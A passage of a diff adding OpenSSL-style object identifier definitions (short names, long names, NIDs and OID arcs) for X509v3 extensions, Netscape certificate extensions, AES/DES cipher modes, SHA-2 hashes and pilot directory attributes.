+#define SN_key_usage		"keyUsage"
+#define LN_key_usage		"X509v3 Key Usage"
+#define NID_key_usage		83
+#define OBJ_key_usage		OBJ_id_ce,15L
+
+#define SN_private_key_usage_period		"privateKeyUsagePeriod"
+#define LN_private_key_usage_period		"X509v3 Private Key Usage Period"
+#define NID_private_key_usage_period		84
+#define OBJ_private_key_usage_period		OBJ_id_ce,16L
+
+#define SN_subject_alt_name		"subjectAltName"
+#define LN_subject_alt_name		"X509v3 Subject Alternative Name"
+#define NID_subject_alt_name		85
+#define OBJ_subject_alt_name		OBJ_id_ce,17L
+
+#define SN_issuer_alt_name		"issuerAltName"
+#define LN_issuer_alt_name		"X509v3 Issuer Alternative Name"
+#define NID_issuer_alt_name		86
+#define OBJ_issuer_alt_name		OBJ_id_ce,18L
+
+#define SN_basic_constraints		"basicConstraints"
+#define LN_basic_constraints		"X509v3 Basic Constraints"
+#define NID_basic_constraints		87
+#define OBJ_basic_constraints		OBJ_id_ce,19L
+
+#define SN_crl_number		"crlNumber"
+#define LN_crl_number		"X509v3 CRL Number"
+#define NID_crl_number		88
+#define OBJ_crl_number		OBJ_id_ce,20L
+
+#define SN_crl_reason		"CRLReason"
+#define LN_crl_reason		"X509v3 CRL Reason Code"
+#define NID_crl_reason		141
+#define OBJ_crl_reason		OBJ_id_ce,21L
+
+#define SN_invalidity_date		"invalidityDate"
+#define LN_invalidity_date		"Invalidity Date"
+#define NID_invalidity_date		142
+#define OBJ_invalidity_date		OBJ_id_ce,24L
+
+#define SN_delta_crl		"deltaCRL"
+#define LN_delta_crl		"X509v3 Delta CRL Indicator"
+#define NID_delta_crl		140
+#define OBJ_delta_crl		OBJ_id_ce,27L
+
+#define SN_issuing_distribution_point		"issuingDistributionPoint"
+#define LN_issuing_distribution_point		"X509v3 Issuing Distrubution Point"
+#define NID_issuing_distribution_point		770
+#define OBJ_issuing_distribution_point		OBJ_id_ce,28L
+
+#define SN_certificate_issuer		"certificateIssuer"
+#define LN_certificate_issuer		"X509v3 Certificate Issuer"
+#define NID_certificate_issuer		771
+#define OBJ_certificate_issuer		OBJ_id_ce,29L
+
+#define SN_name_constraints		"nameConstraints"
+#define LN_name_constraints		"X509v3 Name Constraints"
+#define NID_name_constraints		666
+#define OBJ_name_constraints		OBJ_id_ce,30L
+
+#define SN_crl_distribution_points		"crlDistributionPoints"
+#define LN_crl_distribution_points		"X509v3 CRL Distribution Points"
+#define NID_crl_distribution_points		103
+#define OBJ_crl_distribution_points		OBJ_id_ce,31L
+
+#define SN_certificate_policies		"certificatePolicies"
+#define LN_certificate_policies		"X509v3 Certificate Policies"
+#define NID_certificate_policies		89
+#define OBJ_certificate_policies		OBJ_id_ce,32L
+
+#define SN_any_policy		"anyPolicy"
+#define LN_any_policy		"X509v3 Any Policy"
+#define NID_any_policy		746
+#define OBJ_any_policy		OBJ_certificate_policies,0L
+
+#define SN_policy_mappings		"policyMappings"
+#define LN_policy_mappings		"X509v3 Policy Mappings"
+#define NID_policy_mappings		747
+#define OBJ_policy_mappings		OBJ_id_ce,33L
+
+#define SN_authority_key_identifier		"authorityKeyIdentifier"
+#define LN_authority_key_identifier		"X509v3 Authority Key Identifier"
+#define NID_authority_key_identifier		90
+#define OBJ_authority_key_identifier		OBJ_id_ce,35L
+
+#define SN_policy_constraints		"policyConstraints"
+#define LN_policy_constraints		"X509v3 Policy Constraints"
+#define NID_policy_constraints		401
+#define OBJ_policy_constraints		OBJ_id_ce,36L
+
+#define SN_ext_key_usage		"extendedKeyUsage"
+#define LN_ext_key_usage		"X509v3 Extended Key Usage"
+#define NID_ext_key_usage		126
+#define OBJ_ext_key_usage		OBJ_id_ce,37L
+
+#define SN_freshest_crl		"freshestCRL"
+#define LN_freshest_crl		"X509v3 Freshest CRL"
+#define NID_freshest_crl		857
+#define OBJ_freshest_crl		OBJ_id_ce,46L
+
+#define SN_inhibit_any_policy		"inhibitAnyPolicy"
+#define LN_inhibit_any_policy		"X509v3 Inhibit Any Policy"
+#define NID_inhibit_any_policy		748
+#define OBJ_inhibit_any_policy		OBJ_id_ce,54L
+
+#define SN_target_information		"targetInformation"
+#define LN_target_information		"X509v3 AC Targeting"
+#define NID_target_information		402
+#define OBJ_target_information		OBJ_id_ce,55L
+
+#define SN_no_rev_avail		"noRevAvail"
+#define LN_no_rev_avail		"X509v3 No Revocation Available"
+#define NID_no_rev_avail		403
+#define OBJ_no_rev_avail		OBJ_id_ce,56L
+
+#define SN_anyExtendedKeyUsage		"anyExtendedKeyUsage"
+#define LN_anyExtendedKeyUsage		"Any Extended Key Usage"
+#define NID_anyExtendedKeyUsage		910
+#define OBJ_anyExtendedKeyUsage		OBJ_ext_key_usage,0L
+
+#define SN_netscape		"Netscape"
+#define LN_netscape		"Netscape Communications Corp."
+#define NID_netscape		57
+#define OBJ_netscape		2L,16L,840L,1L,113730L
+
+#define SN_netscape_cert_extension		"nsCertExt"
+#define LN_netscape_cert_extension		"Netscape Certificate Extension"
+#define NID_netscape_cert_extension		58
+#define OBJ_netscape_cert_extension		OBJ_netscape,1L
+
+#define SN_netscape_data_type		"nsDataType"
+#define LN_netscape_data_type		"Netscape Data Type"
+#define NID_netscape_data_type		59
+#define OBJ_netscape_data_type		OBJ_netscape,2L
+
+#define SN_netscape_cert_type		"nsCertType"
+#define LN_netscape_cert_type		"Netscape Cert Type"
+#define NID_netscape_cert_type		71
+#define OBJ_netscape_cert_type		OBJ_netscape_cert_extension,1L
+
+#define SN_netscape_base_url		"nsBaseUrl"
+#define LN_netscape_base_url		"Netscape Base Url"
+#define NID_netscape_base_url		72
+#define OBJ_netscape_base_url		OBJ_netscape_cert_extension,2L
+
+#define SN_netscape_revocation_url		"nsRevocationUrl"
+#define LN_netscape_revocation_url		"Netscape Revocation Url"
+#define NID_netscape_revocation_url		73
+#define OBJ_netscape_revocation_url		OBJ_netscape_cert_extension,3L
+
+#define SN_netscape_ca_revocation_url		"nsCaRevocationUrl"
+#define LN_netscape_ca_revocation_url		"Netscape CA Revocation Url"
+#define NID_netscape_ca_revocation_url		74
+#define OBJ_netscape_ca_revocation_url		OBJ_netscape_cert_extension,4L
+
+#define SN_netscape_renewal_url		"nsRenewalUrl"
+#define LN_netscape_renewal_url		"Netscape Renewal Url"
+#define NID_netscape_renewal_url		75
+#define OBJ_netscape_renewal_url		OBJ_netscape_cert_extension,7L
+
+#define SN_netscape_ca_policy_url		"nsCaPolicyUrl"
+#define LN_netscape_ca_policy_url		"Netscape CA Policy Url"
+#define NID_netscape_ca_policy_url		76
+#define OBJ_netscape_ca_policy_url		OBJ_netscape_cert_extension,8L
+
+#define SN_netscape_ssl_server_name		"nsSslServerName"
+#define LN_netscape_ssl_server_name		"Netscape SSL Server Name"
+#define NID_netscape_ssl_server_name		77
+#define OBJ_netscape_ssl_server_name		OBJ_netscape_cert_extension,12L
+
+#define SN_netscape_comment		"nsComment"
+#define LN_netscape_comment		"Netscape Comment"
+#define NID_netscape_comment		78
+#define OBJ_netscape_comment		OBJ_netscape_cert_extension,13L
+
+#define SN_netscape_cert_sequence		"nsCertSequence"
+#define LN_netscape_cert_sequence		"Netscape Certificate Sequence"
+#define NID_netscape_cert_sequence		79
+#define OBJ_netscape_cert_sequence		OBJ_netscape_data_type,5L
+
+#define SN_ns_sgc		"nsSGC"
+#define LN_ns_sgc		"Netscape Server Gated Crypto"
+#define NID_ns_sgc		139
+#define OBJ_ns_sgc		OBJ_netscape,4L,1L
+
+#define SN_org		"ORG"
+#define LN_org		"org"
+#define NID_org		379
+#define OBJ_org		OBJ_iso,3L
+
+#define SN_dod		"DOD"
+#define LN_dod		"dod"
+#define NID_dod		380
+#define OBJ_dod		OBJ_org,6L
+
+#define SN_iana		"IANA"
+#define LN_iana		"iana"
+#define NID_iana		381
+#define OBJ_iana		OBJ_dod,1L
+
+#define OBJ_internet		OBJ_iana
+
+#define SN_Directory		"directory"
+#define LN_Directory		"Directory"
+#define NID_Directory		382
+#define OBJ_Directory		OBJ_internet,1L
+
+#define SN_Management		"mgmt"
+#define LN_Management		"Management"
+#define NID_Management		383
+#define OBJ_Management		OBJ_internet,2L
+
+#define SN_Experimental		"experimental"
+#define LN_Experimental		"Experimental"
+#define NID_Experimental		384
+#define OBJ_Experimental		OBJ_internet,3L
+
+#define SN_Private		"private"
+#define LN_Private		"Private"
+#define NID_Private		385
+#define OBJ_Private		OBJ_internet,4L
+
+#define SN_Security		"security"
+#define LN_Security		"Security"
+#define NID_Security		386
+#define OBJ_Security		OBJ_internet,5L
+
+#define SN_SNMPv2		"snmpv2"
+#define LN_SNMPv2		"SNMPv2"
+#define NID_SNMPv2		387
+#define OBJ_SNMPv2		OBJ_internet,6L
+
+#define LN_Mail		"Mail"
+#define NID_Mail		388
+#define OBJ_Mail		OBJ_internet,7L
+
+#define SN_Enterprises		"enterprises"
+#define LN_Enterprises		"Enterprises"
+#define NID_Enterprises		389
+#define OBJ_Enterprises		OBJ_Private,1L
+
+#define SN_dcObject		"dcobject"
+#define LN_dcObject		"dcObject"
+#define NID_dcObject		390
+#define OBJ_dcObject		OBJ_Enterprises,1466L,344L
+
+#define SN_mime_mhs		"mime-mhs"
+#define LN_mime_mhs		"MIME MHS"
+#define NID_mime_mhs		504
+#define OBJ_mime_mhs		OBJ_Mail,1L
+
+#define SN_mime_mhs_headings		"mime-mhs-headings"
+#define LN_mime_mhs_headings		"mime-mhs-headings"
+#define NID_mime_mhs_headings		505
+#define OBJ_mime_mhs_headings		OBJ_mime_mhs,1L
+
+#define SN_mime_mhs_bodies		"mime-mhs-bodies"
+#define LN_mime_mhs_bodies		"mime-mhs-bodies"
+#define NID_mime_mhs_bodies		506
+#define OBJ_mime_mhs_bodies		OBJ_mime_mhs,2L
+
+#define SN_id_hex_partial_message		"id-hex-partial-message"
+#define LN_id_hex_partial_message		"id-hex-partial-message"
+#define NID_id_hex_partial_message		507
+#define OBJ_id_hex_partial_message		OBJ_mime_mhs_headings,1L
+
+#define SN_id_hex_multipart_message		"id-hex-multipart-message"
+#define LN_id_hex_multipart_message		"id-hex-multipart-message"
+#define NID_id_hex_multipart_message		508
+#define OBJ_id_hex_multipart_message		OBJ_mime_mhs_headings,2L
+
+#define SN_rle_compression		"RLE"
+#define LN_rle_compression		"run length compression"
+#define NID_rle_compression		124
+#define OBJ_rle_compression		1L,1L,1L,1L,666L,1L
+
+#define SN_zlib_compression		"ZLIB"
+#define LN_zlib_compression		"zlib compression"
+#define NID_zlib_compression		125
+#define OBJ_zlib_compression		OBJ_id_smime_alg,8L
+
+#define OBJ_csor		2L,16L,840L,1L,101L,3L
+
+#define OBJ_nistAlgorithms		OBJ_csor,4L
+
+#define OBJ_aes		OBJ_nistAlgorithms,1L
+
+#define SN_aes_128_ecb		"AES-128-ECB"
+#define LN_aes_128_ecb		"aes-128-ecb"
+#define NID_aes_128_ecb		418
+#define OBJ_aes_128_ecb		OBJ_aes,1L
+
+#define SN_aes_128_cbc		"AES-128-CBC"
+#define LN_aes_128_cbc		"aes-128-cbc"
+#define NID_aes_128_cbc		419
+#define OBJ_aes_128_cbc		OBJ_aes,2L
+
+#define SN_aes_128_ofb128		"AES-128-OFB"
+#define LN_aes_128_ofb128		"aes-128-ofb"
+#define NID_aes_128_ofb128		420
+#define OBJ_aes_128_ofb128		OBJ_aes,3L
+
+#define SN_aes_128_cfb128		"AES-128-CFB"
+#define LN_aes_128_cfb128		"aes-128-cfb"
+#define NID_aes_128_cfb128		421
+#define OBJ_aes_128_cfb128		OBJ_aes,4L
+
+#define SN_id_aes128_wrap		"id-aes128-wrap"
+#define NID_id_aes128_wrap		788
+#define OBJ_id_aes128_wrap		OBJ_aes,5L
+
+#define SN_aes_128_gcm		"id-aes128-GCM"
+#define LN_aes_128_gcm		"aes-128-gcm"
+#define NID_aes_128_gcm		895
+#define OBJ_aes_128_gcm		OBJ_aes,6L
+
+#define SN_aes_128_ccm		"id-aes128-CCM"
+#define LN_aes_128_ccm		"aes-128-ccm"
+#define NID_aes_128_ccm		896
+#define OBJ_aes_128_ccm		OBJ_aes,7L
+
+#define SN_id_aes128_wrap_pad		"id-aes128-wrap-pad"
+#define NID_id_aes128_wrap_pad		897
+#define OBJ_id_aes128_wrap_pad		OBJ_aes,8L
+
+#define SN_aes_192_ecb		"AES-192-ECB"
+#define LN_aes_192_ecb		"aes-192-ecb"
+#define NID_aes_192_ecb		422
+#define OBJ_aes_192_ecb		OBJ_aes,21L
+
+#define SN_aes_192_cbc		"AES-192-CBC"
+#define LN_aes_192_cbc		"aes-192-cbc"
+#define NID_aes_192_cbc		423
+#define OBJ_aes_192_cbc		OBJ_aes,22L
+
+#define SN_aes_192_ofb128		"AES-192-OFB"
+#define LN_aes_192_ofb128		"aes-192-ofb"
+#define NID_aes_192_ofb128		424
+#define OBJ_aes_192_ofb128		OBJ_aes,23L
+
+#define SN_aes_192_cfb128		"AES-192-CFB"
+#define LN_aes_192_cfb128		"aes-192-cfb"
+#define NID_aes_192_cfb128		425
+#define OBJ_aes_192_cfb128		OBJ_aes,24L
+
+#define SN_id_aes192_wrap		"id-aes192-wrap"
+#define NID_id_aes192_wrap		789
+#define OBJ_id_aes192_wrap		OBJ_aes,25L
+
+#define SN_aes_192_gcm		"id-aes192-GCM"
+#define LN_aes_192_gcm		"aes-192-gcm"
+#define NID_aes_192_gcm		898
+#define OBJ_aes_192_gcm		OBJ_aes,26L
+
+#define SN_aes_192_ccm		"id-aes192-CCM"
+#define LN_aes_192_ccm		"aes-192-ccm"
+#define NID_aes_192_ccm		899
+#define OBJ_aes_192_ccm		OBJ_aes,27L
+
+#define SN_id_aes192_wrap_pad		"id-aes192-wrap-pad"
+#define NID_id_aes192_wrap_pad		900
+#define OBJ_id_aes192_wrap_pad		OBJ_aes,28L
+
+#define SN_aes_256_ecb		"AES-256-ECB"
+#define LN_aes_256_ecb		"aes-256-ecb"
+#define NID_aes_256_ecb		426
+#define OBJ_aes_256_ecb		OBJ_aes,41L
+
+#define SN_aes_256_cbc		"AES-256-CBC"
+#define LN_aes_256_cbc		"aes-256-cbc"
+#define NID_aes_256_cbc		427
+#define OBJ_aes_256_cbc		OBJ_aes,42L
+
+#define SN_aes_256_ofb128		"AES-256-OFB"
+#define LN_aes_256_ofb128		"aes-256-ofb"
+#define NID_aes_256_ofb128		428
+#define OBJ_aes_256_ofb128		OBJ_aes,43L
+
+#define SN_aes_256_cfb128		"AES-256-CFB"
+#define LN_aes_256_cfb128		"aes-256-cfb"
+#define NID_aes_256_cfb128		429
+#define OBJ_aes_256_cfb128		OBJ_aes,44L
+
+#define SN_id_aes256_wrap		"id-aes256-wrap"
+#define NID_id_aes256_wrap		790
+#define OBJ_id_aes256_wrap		OBJ_aes,45L
+
+#define SN_aes_256_gcm		"id-aes256-GCM"
+#define LN_aes_256_gcm		"aes-256-gcm"
+#define NID_aes_256_gcm		901
+#define OBJ_aes_256_gcm		OBJ_aes,46L
+
+#define SN_aes_256_ccm		"id-aes256-CCM"
+#define LN_aes_256_ccm		"aes-256-ccm"
+#define NID_aes_256_ccm		902
+#define OBJ_aes_256_ccm		OBJ_aes,47L
+
+#define SN_id_aes256_wrap_pad		"id-aes256-wrap-pad"
+#define NID_id_aes256_wrap_pad		903
+#define OBJ_id_aes256_wrap_pad		OBJ_aes,48L
+
+#define SN_aes_128_cfb1		"AES-128-CFB1"
+#define LN_aes_128_cfb1		"aes-128-cfb1"
+#define NID_aes_128_cfb1		650
+
+#define SN_aes_192_cfb1		"AES-192-CFB1"
+#define LN_aes_192_cfb1		"aes-192-cfb1"
+#define NID_aes_192_cfb1		651
+
+#define SN_aes_256_cfb1		"AES-256-CFB1"
+#define LN_aes_256_cfb1		"aes-256-cfb1"
+#define NID_aes_256_cfb1		652
+
+#define SN_aes_128_cfb8		"AES-128-CFB8"
+#define LN_aes_128_cfb8		"aes-128-cfb8"
+#define NID_aes_128_cfb8		653
+
+#define SN_aes_192_cfb8		"AES-192-CFB8"
+#define LN_aes_192_cfb8		"aes-192-cfb8"
+#define NID_aes_192_cfb8		654
+
+#define SN_aes_256_cfb8		"AES-256-CFB8"
+#define LN_aes_256_cfb8		"aes-256-cfb8"
+#define NID_aes_256_cfb8		655
+
+#define SN_aes_128_ctr		"AES-128-CTR"
+#define LN_aes_128_ctr		"aes-128-ctr"
+#define NID_aes_128_ctr		904
+
+#define SN_aes_192_ctr		"AES-192-CTR"
+#define LN_aes_192_ctr		"aes-192-ctr"
+#define NID_aes_192_ctr		905
+
+#define SN_aes_256_ctr		"AES-256-CTR"
+#define LN_aes_256_ctr		"aes-256-ctr"
+#define NID_aes_256_ctr		906
+
+#define SN_aes_128_xts		"AES-128-XTS"
+#define LN_aes_128_xts		"aes-128-xts"
+#define NID_aes_128_xts		913
+
+#define SN_aes_256_xts		"AES-256-XTS"
+#define LN_aes_256_xts		"aes-256-xts"
+#define NID_aes_256_xts		914
+
+#define SN_des_cfb1		"DES-CFB1"
+#define LN_des_cfb1		"des-cfb1"
+#define NID_des_cfb1		656
+
+#define SN_des_cfb8		"DES-CFB8"
+#define LN_des_cfb8		"des-cfb8"
+#define NID_des_cfb8		657
+
+#define SN_des_ede3_cfb1		"DES-EDE3-CFB1"
+#define LN_des_ede3_cfb1		"des-ede3-cfb1"
+#define NID_des_ede3_cfb1		658
+
+#define SN_des_ede3_cfb8		"DES-EDE3-CFB8"
+#define LN_des_ede3_cfb8		"des-ede3-cfb8"
+#define NID_des_ede3_cfb8		659
+
+#define OBJ_nist_hashalgs		OBJ_nistAlgorithms,2L
+
+#define SN_sha256		"SHA256"
+#define LN_sha256		"sha256"
+#define NID_sha256		672
+#define OBJ_sha256		OBJ_nist_hashalgs,1L
+
+#define SN_sha384		"SHA384"
+#define LN_sha384		"sha384"
+#define NID_sha384		673
+#define OBJ_sha384		OBJ_nist_hashalgs,2L
+
+#define SN_sha512		"SHA512"
+#define LN_sha512		"sha512"
+#define NID_sha512		674
+#define OBJ_sha512		OBJ_nist_hashalgs,3L
+
+#define SN_sha224		"SHA224"
+#define LN_sha224		"sha224"
+#define NID_sha224		675
+#define OBJ_sha224		OBJ_nist_hashalgs,4L
+
+#define OBJ_dsa_with_sha2		OBJ_nistAlgorithms,3L
+
+#define SN_dsa_with_SHA224		"dsa_with_SHA224"
+#define NID_dsa_with_SHA224		802
+#define OBJ_dsa_with_SHA224		OBJ_dsa_with_sha2,1L
+
+#define SN_dsa_with_SHA256		"dsa_with_SHA256"
+#define NID_dsa_with_SHA256		803
+#define OBJ_dsa_with_SHA256		OBJ_dsa_with_sha2,2L
+
+#define SN_hold_instruction_code		"holdInstructionCode"
+#define LN_hold_instruction_code		"Hold Instruction Code"
+#define NID_hold_instruction_code		430
+#define OBJ_hold_instruction_code		OBJ_id_ce,23L
+
+#define OBJ_holdInstruction		OBJ_X9_57,2L
+
+#define SN_hold_instruction_none		"holdInstructionNone"
+#define LN_hold_instruction_none		"Hold Instruction None"
+#define NID_hold_instruction_none		431
+#define OBJ_hold_instruction_none		OBJ_holdInstruction,1L
+
+#define SN_hold_instruction_call_issuer		"holdInstructionCallIssuer"
+#define LN_hold_instruction_call_issuer		"Hold Instruction Call Issuer"
+#define NID_hold_instruction_call_issuer		432
+#define OBJ_hold_instruction_call_issuer		OBJ_holdInstruction,2L
+
+#define SN_hold_instruction_reject		"holdInstructionReject"
+#define LN_hold_instruction_reject		"Hold Instruction Reject"
+#define NID_hold_instruction_reject		433
+#define OBJ_hold_instruction_reject		OBJ_holdInstruction,3L
+
+#define SN_data		"data"
+#define NID_data		434
+#define OBJ_data		OBJ_itu_t,9L
+
+#define SN_pss		"pss"
+#define NID_pss		435
+#define OBJ_pss		OBJ_data,2342L
+
+#define SN_ucl		"ucl"
+#define NID_ucl		436
+#define OBJ_ucl		OBJ_pss,19200300L
+
+#define SN_pilot		"pilot"
+#define NID_pilot		437
+#define OBJ_pilot		OBJ_ucl,100L
+
+#define LN_pilotAttributeType		"pilotAttributeType"
+#define NID_pilotAttributeType		438
+#define OBJ_pilotAttributeType		OBJ_pilot,1L
+
+#define LN_pilotAttributeSyntax		"pilotAttributeSyntax"
+#define NID_pilotAttributeSyntax		439
+#define OBJ_pilotAttributeSyntax		OBJ_pilot,3L
+
+#define LN_pilotObjectClass		"pilotObjectClass"
+#define NID_pilotObjectClass		440
+#define OBJ_pilotObjectClass		OBJ_pilot,4L
+
+#define LN_pilotGroups		"pilotGroups"
+#define NID_pilotGroups		441
+#define OBJ_pilotGroups		OBJ_pilot,10L
+
+#define LN_iA5StringSyntax		"iA5StringSyntax"
+#define NID_iA5StringSyntax		442
+#define OBJ_iA5StringSyntax		OBJ_pilotAttributeSyntax,4L
+
+#define LN_caseIgnoreIA5StringSyntax		"caseIgnoreIA5StringSyntax"
+#define NID_caseIgnoreIA5StringSyntax		443
+#define OBJ_caseIgnoreIA5StringSyntax		OBJ_pilotAttributeSyntax,5L
+
+#define LN_pilotObject		"pilotObject"
+#define NID_pilotObject		444
+#define OBJ_pilotObject		OBJ_pilotObjectClass,3L
+
+#define LN_pilotPerson		"pilotPerson"
+#define NID_pilotPerson		445
+#define OBJ_pilotPerson		OBJ_pilotObjectClass,4L
+
+#define SN_account		"account"
+#define NID_account		446
+#define OBJ_account		OBJ_pilotObjectClass,5L
+
+#define SN_document		"document"
+#define NID_document		447
+#define OBJ_document		OBJ_pilotObjectClass,6L
+
+#define SN_room		"room"
+#define NID_room		448
+#define OBJ_room		OBJ_pilotObjectClass,7L
+
+#define LN_documentSeries		"documentSeries"
+#define NID_documentSeries		449
+#define OBJ_documentSeries		OBJ_pilotObjectClass,9L
+
+#define SN_Domain		"domain"
+#define LN_Domain		"Domain"
+#define NID_Domain		392
+#define OBJ_Domain		OBJ_pilotObjectClass,13L
+
+#define LN_rFC822localPart		"rFC822localPart"
+#define NID_rFC822localPart		450
+#define OBJ_rFC822localPart		OBJ_pilotObjectClass,14L
+
+#define LN_dNSDomain		"dNSDomain"
+#define NID_dNSDomain		451
+#define OBJ_dNSDomain		OBJ_pilotObjectClass,15L
+
+#define LN_domainRelatedObject		"domainRelatedObject"
+#define NID_domainRelatedObject		452
+#define OBJ_domainRelatedObject		OBJ_pilotObjectClass,17L
+
+#define LN_friendlyCountry		"friendlyCountry"
+#define NID_friendlyCountry		453
+#define OBJ_friendlyCountry		OBJ_pilotObjectClass,18L
+
+#define LN_simpleSecurityObject		"simpleSecurityObject"
+#define NID_simpleSecurityObject		454
+#define OBJ_simpleSecurityObject		OBJ_pilotObjectClass,19L
+
+#define LN_pilotOrganization		"pilotOrganization"
+#define NID_pilotOrganization		455
+#define OBJ_pilotOrganization		OBJ_pilotObjectClass,20L
+
+#define LN_pilotDSA		"pilotDSA"
+#define NID_pilotDSA		456
+#define OBJ_pilotDSA		OBJ_pilotObjectClass,21L
+
+#define LN_qualityLabelledData		"qualityLabelledData"
+#define NID_qualityLabelledData		457
+#define OBJ_qualityLabelledData		OBJ_pilotObjectClass,22L
+
+#define SN_userId		"UID"
+#define LN_userId		"userId"
+#define NID_userId		458
+#define OBJ_userId		OBJ_pilotAttributeType,1L
+
+#define LN_textEncodedORAddress		"textEncodedORAddress"
+#define NID_textEncodedORAddress		459
+#define OBJ_textEncodedORAddress		OBJ_pilotAttributeType,2L
+
+#define SN_rfc822Mailbox		"mail"
+#define LN_rfc822Mailbox		"rfc822Mailbox"
+#define NID_rfc822Mailbox		460
+#define OBJ_rfc822Mailbox		OBJ_pilotAttributeType,3L
+
+#define SN_info		"info"
+#define NID_info		461
+#define OBJ_info		OBJ_pilotAttributeType,4L
+
+#define LN_favouriteDrink		"favouriteDrink"
+#define NID_favouriteDrink		462
+#define OBJ_favouriteDrink		OBJ_pilotAttributeType,5L
+
+#define LN_roomNumber		"roomNumber"
+#define NID_roomNumber		463
+#define OBJ_roomNumber		OBJ_pilotAttributeType,6L
+
+#define SN_photo		"photo"
+#define NID_photo		464
+#define OBJ_photo		OBJ_pilotAttributeType,7L
+
+#define LN_userClass		"userClass"
+#define NID_userClass		465
+#define OBJ_userClass		OBJ_pilotAttributeType,8L
+
+#define SN_host		"host"
+#define NID_host		466
+#define OBJ_host		OBJ_pilotAttributeType,9L
+
+#define SN_manager		"manager"
+#define NID_manager		467
+#define OBJ_manager		OBJ_pilotAttributeType,10L
+
+#define LN_documentIdentifier		"documentIdentifier"
+#define NID_documentIdentifier		468
+#define OBJ_documentIdentifier		OBJ_pilotAttributeType,11L
+
+#define LN_documentTitle		"documentTitle"
+#define NID_documentTitle		469
+#define OBJ_documentTitle		OBJ_pilotAttributeType,12L
+
+#define LN_documentVersion		"documentVersion"
+#define NID_documentVersion		470
+#define OBJ_documentVersion		OBJ_pilotAttributeType,13L
+
+#define LN_documentAuthor		"documentAuthor"
+#define NID_documentAuthor		471
+#define OBJ_documentAuthor		OBJ_pilotAttributeType,14L
+
+#define LN_documentLocation		"documentLocation"
+#define NID_documentLocation		472
+#define OBJ_documentLocation		OBJ_pilotAttributeType,15L
+
+#define LN_homeTelephoneNumber		"homeTelephoneNumber"
+#define NID_homeTelephoneNumber		473
+#define OBJ_homeTelephoneNumber		OBJ_pilotAttributeType,20L
+
+#define SN_secretary		"secretary"
+#define NID_secretary		474
+#define OBJ_secretary		OBJ_pilotAttributeType,21L
+
+#define LN_otherMailbox		"otherMailbox"
+#define NID_otherMailbox		475
+#define OBJ_otherMailbox		OBJ_pilotAttributeType,22L
+
+#define LN_lastModifiedTime		"lastModifiedTime"
+#define NID_lastModifiedTime		476
+#define OBJ_lastModifiedTime		OBJ_pilotAttributeType,23L
+
+#define LN_lastModifiedBy		"lastModifiedBy"
+#define NID_lastModifiedBy		477
+#define OBJ_lastModifiedBy		OBJ_pilotAttributeType,24L
+
+#define SN_domainComponent		"DC"
+#define LN_domainComponent		"domainComponent"
+#define NID_domainComponent		391
+#define OBJ_domainComponent		OBJ_pilotAttributeType,25L
+
+#define LN_aRecord		"aRecord"
+#define NID_aRecord		478
+#define OBJ_aRecord		OBJ_pilotAttributeType,26L
+
+#define LN_pilotAttributeType27		"pilotAttributeType27"
+#define NID_pilotAttributeType27		479
+#define OBJ_pilotAttributeType27		OBJ_pilotAttributeType,27L
+
+#define LN_mXRecord		"mXRecord"
+#define NID_mXRecord		480
+#define OBJ_mXRecord		OBJ_pilotAttributeType,28L
+
+#define LN_nSRecord		"nSRecord"
+#define NID_nSRecord		481
+#define OBJ_nSRecord		OBJ_pilotAttributeType,29L
+
+#define LN_sOARecord		"sOARecord"
+#define NID_sOARecord		482
+#define OBJ_sOARecord		OBJ_pilotAttributeType,30L
+
+#define LN_cNAMERecord		"cNAMERecord"
+#define NID_cNAMERecord		483
+#define OBJ_cNAMERecord		OBJ_pilotAttributeType,31L
+
+#define LN_associatedDomain		"associatedDomain"
+#define NID_associatedDomain		484
+#define OBJ_associatedDomain		OBJ_pilotAttributeType,37L
+
+#define LN_associatedName		"associatedName"
+#define NID_associatedName		485
+#define OBJ_associatedName		OBJ_pilotAttributeType,38L
+
+#define LN_homePostalAddress		"homePostalAddress"
+#define NID_homePostalAddress		486
+#define OBJ_homePostalAddress		OBJ_pilotAttributeType,39L
+
+#define LN_personalTitle		"personalTitle"
+#define NID_personalTitle		487
+#define OBJ_personalTitle		OBJ_pilotAttributeType,40L
+
+#define LN_mobileTelephoneNumber		"mobileTelephoneNumber"
+#define NID_mobileTelephoneNumber		488
+#define OBJ_mobileTelephoneNumber		OBJ_pilotAttributeType,41L
+
+#define LN_pagerTelephoneNumber		"pagerTelephoneNumber"
+#define NID_pagerTelephoneNumber		489
+#define OBJ_pagerTelephoneNumber		OBJ_pilotAttributeType,42L
+
+#define LN_friendlyCountryName		"friendlyCountryName"
+#define NID_friendlyCountryName		490
+#define OBJ_friendlyCountryName		OBJ_pilotAttributeType,43L
+
+#define LN_organizationalStatus		"organizationalStatus"
+#define NID_organizationalStatus		491
+#define OBJ_organizationalStatus		OBJ_pilotAttributeType,45L
+
+#define LN_janetMailbox		"janetMailbox"
+#define NID_janetMailbox		492
+#define OBJ_janetMailbox		OBJ_pilotAttributeType,46L
+
+#define LN_mailPreferenceOption		"mailPreferenceOption"
+#define NID_mailPreferenceOption		493
+#define OBJ_mailPreferenceOption		OBJ_pilotAttributeType,47L
+
+#define LN_buildingName		"buildingName"
+#define NID_buildingName		494
+#define OBJ_buildingName		OBJ_pilotAttributeType,48L
+
+#define LN_dSAQuality		"dSAQuality"
+#define NID_dSAQuality		495
+#define OBJ_dSAQuality		OBJ_pilotAttributeType,49L
+
+#define LN_singleLevelQuality		"singleLevelQuality"
+#define NID_singleLevelQuality		496
+#define OBJ_singleLevelQuality		OBJ_pilotAttributeType,50L
+
+#define LN_subtreeMinimumQuality		"subtreeMinimumQuality"
+#define NID_subtreeMinimumQuality		497
+#define OBJ_subtreeMinimumQuality		OBJ_pilotAttributeType,51L
+
+#define LN_subtreeMaximumQuality		"subtreeMaximumQuality"
+#define NID_subtreeMaximumQuality		498
+#define OBJ_subtreeMaximumQuality		OBJ_pilotAttributeType,52L
+
+#define LN_personalSignature		"personalSignature"
+#define NID_personalSignature		499
+#define OBJ_personalSignature		OBJ_pilotAttributeType,53L
+
+#define LN_dITRedirect		"dITRedirect"
+#define NID_dITRedirect		500
+#define OBJ_dITRedirect		OBJ_pilotAttributeType,54L
+
+#define SN_audio		"audio"
+#define NID_audio		501
+#define OBJ_audio		OBJ_pilotAttributeType,55L
+
+#define LN_documentPublisher		"documentPublisher"
+#define NID_documentPublisher		502
+#define OBJ_documentPublisher		OBJ_pilotAttributeType,56L
+
+#define SN_id_set		"id-set"
+#define LN_id_set		"Secure Electronic Transactions"
+#define NID_id_set		512
+#define OBJ_id_set		OBJ_international_organizations,42L
+
